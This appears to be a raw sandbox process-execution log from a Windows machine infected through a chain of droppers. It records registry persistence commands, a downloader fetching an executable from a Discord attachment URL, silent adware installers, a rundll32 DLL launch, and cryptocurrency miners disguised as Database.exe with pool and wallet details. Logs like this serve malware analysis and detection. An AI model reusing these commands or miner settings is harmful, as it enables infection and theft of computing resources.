C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5156 -ip 5156
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BA0B7A51998FEE08DA32A3036127A0B5 C
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 280
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6312 -ip 6312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 276
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-PDGPV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PDGPV.tmp\Setup.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 380 -p 5144 -ip 5144
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\14322\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5144 -s 2444
C:\Users\Admin\AppData\Local\Temp\build\build.exe
"C:\Users\Admin\AppData\Local\Temp\build\build.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding ECC53CB7737134A087C5C387A941DED6
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe
"C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp" /SL5="$207CA,281924,62464,C:\Users\Admin\AppData\Local\Temp\IDANZRKCEG\ultramediaburner.exe" /VERYSILENT
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BE1356FCD8E9D8AB3EF9E1B0AE60B993 C
C:\Users\Admin\AppData\Local\Temp\b0-3d0d8-d76-d6ead-112ff92270293\Caemamylyxo.exe
"C:\Users\Admin\AppData\Local\Temp\b0-3d0d8-d76-d6ead-112ff92270293\Caemamylyxo.exe"
C:\Users\Admin\AppData\Local\Temp\76-1834a-5eb-f19aa-afce1c19b551c\ZHyzhekanifi.exe
"C:\Users\Admin\AppData\Local\Temp\76-1834a-5eb-f19aa-afce1c19b551c\ZHyzhekanifi.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 656 -p 7840 -ip 7840
C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-INMTB.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7212 -ip 7212
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7840 -s 2412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2896 -ip 2896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 280
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6476 -ip 6476
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2416
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0bb846f8,0x7ffa0bb84708,0x7ffa0bb84718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
C:\ProgramData\Data\Database.exe
"C:\ProgramData\Data\Database.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 6888 -ip 6888
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6888 -s 124
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0abfc8c5-4e2f-3d40-a51d-2f2740842d0a}\oemvista.inf" "9" "4d14a44ff" "0000000000000144" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\ProgramData\Data\Database.exe
-epool eth-eu1.nanopool.org:9999 -ewal 0x49D4468FB0205F38d102236C33ad424764Fe94C8 -worker Hesoyam -epsw Hesoyam2281337 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth -acm"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000144" "9e70"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3928 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa0bb846f8,0x7ffa0bb84708,0x7ffa0bb84718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ivm2ceyj.33y\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe /eufive
C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe
C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe & exit
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1780 -ip 1780
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 276
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 225A4115411207A569DF473F22DEA76A C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe /mixfive & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\sr3jm311.zh0\anyname.exe" -q
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sub0nzvt.ah1\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\tcid5r42.3dq\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5784 -ip 5784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 280
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cvjmfrtq.f1z\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8160 -ip 8160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8160 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
